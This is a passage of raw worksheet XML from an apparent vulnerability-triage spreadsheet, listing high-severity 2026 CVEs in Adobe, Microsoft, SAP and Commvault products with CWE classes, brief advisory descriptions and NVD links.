t="inlineStr"><is><t>New</t></is></c><c r="C623" s="5" t="inlineStr"><is><t>CVE-2026-75863</t></is></c><c r="D623" s="5" t="n"><v>7.8</v></c><c r="E623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F623" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G623" s="5" t="inlineStr" /><c r="H623" s="5" t="n"><v>0.002</v></c><c r="I623" s="5" t="inlineStr" /><c r="J623" s="5" t="inlineStr" /><c r="K623" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L623" s="5" t="inlineStr" /><c r="M623" s="5" t="inlineStr" /><c r="N623" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P623" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q623" s="5" t="inlineStr" /><c r="R623" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S623"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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t></is></c></row><row r="624"><c r="A624" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B624" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C624" s="5" t="inlineStr"><is><t>CVE-2026-75992</t></is></c><c r="D624" s="5" t="n"><v>7.8</v></c><c r="E624" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F624" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G624" s="5" t="inlineStr" /><c r="H624" s="5" t="n"><v>0.002</v></c><c r="I624" s="5" t="inlineStr" /><c r="J624" s="5" t="inlineStr" /><c r="K624" s="5" t="inlineStr" /><c r="L624" s="5" t="inlineStr" /><c r="M624" s="5" t="inlineStr" /><c r="N624" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O624" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P624" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q624" s="5" t="inlineStr" /><c r="R624" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S624" s="5" t="inlineStr"><is><t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t></is></c></row><row r="625"><c r="A625" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C625" s="5" t="inlineStr"><is><t>CVE-2026-76967</t></is></c><c r="D625" s="5" t="n"><v>7.8</v></c><c r="E625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F625" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G625" s="5" t="inlineStr" /><c r="H625" s="5" t="n"><v>0.002</v></c><c r="I625" s="5" t="inlineStr" /><c r="J625" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K625" s="5" t="inlineStr" /><c r="L625" s="5" t="inlineStr" /><c r="M625" s="5" t="inlineStr" /><c r="N625" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P625" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q625" s="5" t="inlineStr" /><c r="R625" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S625" s="5" t="inlineStr"><is><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is></c><c r="T625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t></is></c></row><row r="626"><c r="A626" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C626" s="5" t="inlineStr"><is><t>CVE-2026-77091</t></is></c><c r="D626" s="5" t="n"><v>7.8</v></c><c r="E626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G626" s="5" t="inlineStr" /><c r="H626" s="5" t="n"><v>0.001</v></c><c r="I626" s="5" t="inlineStr" /><c r="J626" s="5" t="inlineStr" /><c r="K626" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L626" s="5" t="inlineStr" /><c r="M626" s="5" t="inlineStr" /><c r="N626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P626" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q626" s="5" t="inlineStr" /><c r="R626" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S626" s="5" t="inlineStr"><is><t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t></is></c><c r="T626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t></is></c></row><row r="627"><c r="A627" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C627" s="5" t="inlineStr"><is><t>CVE-2026-77489</t></is></c><c r="D627" s="5" t="n"><v>7.8</v></c><c r="E627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F627" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G627" s="5" t="inlineStr" /><c r="H627" s="5" t="n"><v>0.003</v></c><c r="I627" s="5" t="inlineStr" /><c r="J627" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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7" s="5" t="inlineStr" /><c r="M627" s="5" t="inlineStr" /><c r="N627" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P627" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q627" s="5" t="inlineStr" /><c r="R627" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S627" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t></is></c></row><row r="628"><c r="A628" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C628" s="5" t="inlineStr"><is><t>CVE-2026-77500</t></is></c><c r="D628" s="5" t="n"><v>7.8</v></c><c r="E628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F628" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G628" s="5" t="inlineStr" /><c r="H628" s="5" t="n"><v>0.003</v></c><c r="I628" s="5" t="inlineStr" /><c r="J628" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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8" s="5" t="inlineStr" /><c r="M628" s="5" t="inlineStr" /><c r="N628" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P628" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q628" s="5" t="inlineStr" /><c r="R628" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S628" s="5" t="inlineStr"><is><t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t></is></c></row><row r="629"><c r="A629" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C629" s="5" t="inlineStr"><is><t>CVE-2026-77503</t></is></c><c r="D629" s="5" t="n"><v>7.8</v></c><c r="E629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G629" s="5" t="inlineStr" /><c r="H629" s="5" t="n"><v>0.002</v></c><c r="I629" s="5" t="inlineStr" /><c r="J629" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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29" s="5" t="inlineStr" /><c r="M629" s="5" t="inlineStr" /><c r="N629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P629" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q629" s="5" t="inlineStr" /><c r="R629" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S629" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t></is></c></row><row r="630"><c r="A630" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C630" s="5" t="inlineStr"><is><t>CVE-2026-77904</t></is></c><c r="D630" s="5" t="n"><v>7.8</v></c><c r="E630" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F630" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G630" s="5" t="inlineStr" /><c r="H630" s="5" t="n"><v>0.002</v></c><c r="I630" s="5" t="inlineStr" /><c r="J630" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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30" s="5" t="inlineStr" /><c r="M630" s="5" t="inlineStr" /><c r="N630" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P630" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q630" s="5" t="inlineStr" /><c r="R630" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S630" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t></is></c></row><row r="631"><c r="A631" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C631" s="5" t="inlineStr"><is><t>CVE-2026-78447</t></is></c><c r="D631" s="5" t="n"><v>7.8</v></c><c r="E631" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F631" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G631" s="5" t="inlineStr" /><c r="H631" s="5" t="n"><v>0.002</v></c><c r="I631" s="5" t="inlineStr" /><c r="J631" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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31" s="5" t="inlineStr" /><c r="M631" s="5" t="inlineStr" /><c r="N631" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P631" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q631" s="5" t="inlineStr" /><c r="R631" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S631" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t></is></c></row><row r="632"><c r="A632" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C632" s="5" t="inlineStr"><is><t>CVE-2026-78448</t></is></c><c r="D632" s="5" t="n"><v>7.8</v></c><c r="E632" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F632" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G632" s="5" t="inlineStr" /><c r="H632" s="5" t="n"><v>0.002</v></c><c r="I632" s="5" t="inlineStr" /><c r="J632" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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32" s="5" t="inlineStr" /><c r="M632" s="5" t="inlineStr" /><c r="N632" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P632" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q632" s="5" t="inlineStr" /><c r="R632" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S632" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t></is></c></row><row r="633"><c r="A633" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B633" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C633" s="5" t="inlineStr"><is><t>CVE-2026-79907</t></is></c><c r="D633" s="5" t="n"><v>7.8</v></c><c r="E633" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F633" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G633" s="5" t="inlineStr" /><c r="H633" s="5" t="n"><v>0.002</v></c><c r="I633" s="5" t="inlineStr" /><c r="J633" s="5" t="inlineStr" /><c r="K633" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L633" s="5" t="inlineStr" /><c r="M633" s="5" t="inlineStr" /><c r="N633" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P633" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q633" s="5" t="inlineStr" /><c r="R633" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S633" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t></is></c></row><row r="634"><c r="A634" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C634" s="5" t="inlineStr"><is><t>CVE-2026-79908</t></is></c><c r="D634" s="5" t="n"><v>7.8</v></c><c r="E634" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F634" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G634" s="5" t="inlineStr" /><c r="H634" s="5" t="n"><v>0.002</v></c><c r="I634" s="5" t="inlineStr" /><c r="J634" s="5" t="inlineStr" /><c r="K634" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L634" s="5" t="inlineStr" /><c r="M634" s="5" t="inlineStr" /><c r="N634" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P634" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q634" s="5" t="inlineStr" /><c r="R634" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S634" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t></is></c></row><row r="635"><c r="A635" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C635" s="5" t="inlineStr"><is><t>CVE-2026-79909</t></is></c><c r="D635" s="5" t="n"><v>7.8</v></c><c r="E635" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F635" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G635" s="5" t="inlineStr" /><c r="H635" s="5" t="n"><v>0.002</v></c><c r="I635" s="5" t="inlineStr" /><c r="J635" s="5" t="inlineStr" /><c r="K635" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L635" s="5" t="inlineStr" /><c r="M635" s="5" t="inlineStr" /><c r="N635" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P635" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q635" s="5" t="inlineStr" /><c r="R635" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S635" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t></is></c></row><row r="636"><c r="A636" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C636" s="5" t="inlineStr"><is><t>CVE-2026-80075</t></is></c><c r="D636" s="5" t="n"><v>7.8</v></c><c r="E636" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F636" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G636" s="5" t="inlineStr" /><c r="H636" s="5" t="n"><v>0.003</v></c><c r="I636" s="5" t="inlineStr" /><c r="J636" s="5" t="inlineStr" /><c r="K636" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L636" s="5" t="inlineStr" /><c r="M636" s="5" t="inlineStr" /><c r="N636" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P636" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q636" s="5" t="inlineStr" /><c r="R636" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S636" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t></is></c></row><row r="637"><c r="A637" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C637" s="5" t="inlineStr"><is><t>CVE-2026-80161</t></is></c><c r="D637" s="5" t="n"><v>7.8</v></c><c r="E637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F637" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G637" s="5" t="inlineStr" /><c r="H637" s="5" t="n"><v>0.002</v></c><c r="I637" s="5" t="inlineStr" /><c r="J637" s="5" t="inlineStr" /><c r="K637" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L637" s="5" t="inlineStr" /><c r="M637" s="5" t="inlineStr" /><c r="N637" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P637" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q637" s="5" t="inlineStr" /><c r="R637" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S637" s="5" t="inlineStr"><is><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is></c><c r="T637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t></is></c></row><row r="638"><c r="A638" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C638" s="5" t="inlineStr"><is><t>CVE-2026-81353</t></is></c><c r="D638" s="5" t="n"><v>7.8</v></c><c r="E638" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F638" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G638" s="5" t="inlineStr" /><c r="H638" s="5" t="n"><v>0.004</v></c><c r="I638" s="5" t="inlineStr" /><c r="J638" s="5" t="inlineStr" /><c r="K638" s="5" t="inlineStr" /><c r="L638" s="5" t="inlineStr" /><c r="M638" s="5" t="inlineStr" /><c r="N638" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P638" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q638" s="5" t="inlineStr" /><c r="R638" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S638" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="T638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t></is></c></row><row r="639"><c r="A639" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C639" s="5" t="inlineStr"><is><t>CVE-2026-81386</t></is></c><c r="D639" s="5" t="n"><v>7.8</v></c><c r="E639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F639" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G639" s="5" t="inlineStr" /><c r="H639" s="5" t="n"><v>0.003</v></c><c r="I639" s="5" t="inlineStr" /><c r="J639" s="5" t="inlineStr" /><c r="K639" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L639" s="5" t="inlineStr" /><c r="M639" s="5" t="inlineStr" /><c r="N639" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P639" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q639" s="5" t="inlineStr" /><c r="R639" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S639" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t></is></c></row><row r="640"><c r="A640" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C640" s="5" t="inlineStr"><is><t>CVE-2026-81388</t></is></c><c r="D640" s="5" t="n"><v>7.8</v></c><c r="E640" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F640" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G640" s="5" t="inlineStr" /><c r="H640" s="5" t="n"><v>0.004</v></c><c r="I640" s="5" t="inlineStr" /><c r="J640" s="5" t="inlineStr" /><c r="K640" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L640" s="5" t="inlineStr" /><c r="M640" s="5" t="inlineStr" /><c r="N640" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P640" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q640" s="5" t="inlineStr" /><c r="R640" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S640" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t></is></c></row><row r="641"><c r="A641" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C641" s="5" t="inlineStr"><is><t>CVE-2026-81396</t></is></c><c r="D641" s="5" t="n"><v>7.8</v></c><c r="E641" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F641" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G641" s="5" t="inlineStr" /><c r="H641" s="5" t="n"><v>0.004</v></c><c r="I641" s="5" t="inlineStr" /><c r="J641" s="5" t="inlineStr" /><c r="K641" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L641" s="5" t="inlineStr" /><c r="M641" s="5" t="inlineStr" /><c r="N641" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P641" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q641" s="5" t="inlineStr" /><c r="R641" s="5" t="inlineStr"><is><t>CWE-121, CWE-193</t></is></c><c r="S641" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t></is></c></row><row r="642"><c r="A642" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C642" s="5" t="inlineStr"><is><t>CVE-2026-81397</t></is></c><c r="D642" s="5" t="n"><v>7.8</v></c><c r="E642" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F642" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G642" s="5" t="inlineStr" /><c r="H642" s="5" t="n"><v>0.004</v></c><c r="I642" s="5" t="inlineStr" /><c r="J642" s="5" t="inlineStr" /><c r="K642" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L642" s="5" t="inlineStr" /><c r="M642" s="5" t="inlineStr" /><c r="N642" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P642" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q642" s="5" t="inlineStr" /><c r="R642" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S642" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t></is></c></row><row r="643"><c r="A643" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C643" s="5" t="inlineStr"><is><t>CVE-2026-81398</t></is></c><c r="D643" s="5" t="n"><v>7.8</v></c><c r="E643" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F643" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G643" s="5" t="inlineStr" /><c r="H643" s="5" t="n"><v>0.003</v></c><c r="I643" s="5" t="inlineStr" /><c r="J643" s="5" t="inlineStr" /><c r="K643" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L643" s="5" t="inlineStr" /><c r="M643" s="5" t="inlineStr" /><c r="N643" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P643" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q643" s="5" t="inlineStr" /><c r="R643" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S643" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t></is></c></row><row r="644"><c r="A644" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C644" s="5" t="inlineStr"><is><t>CVE-2026-81947</t></is></c><c r="D644" s="5" t="n"><v>7.8</v></c><c r="E644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F644" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G644" s="5" t="inlineStr" /><c r="H644" s="5" t="n"><v>0.003</v></c><c r="I644" s="5" t="inlineStr" /><c r="J644" s="5" t="inlineStr" /><c r="K644" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L644" s="5" t="inlineStr" /><c r="M644" s="5" t="inlineStr" /><c r="N644" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P644" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q644" s="5" t="inlineStr" /><c r="R644" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S644" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T644" s="6" 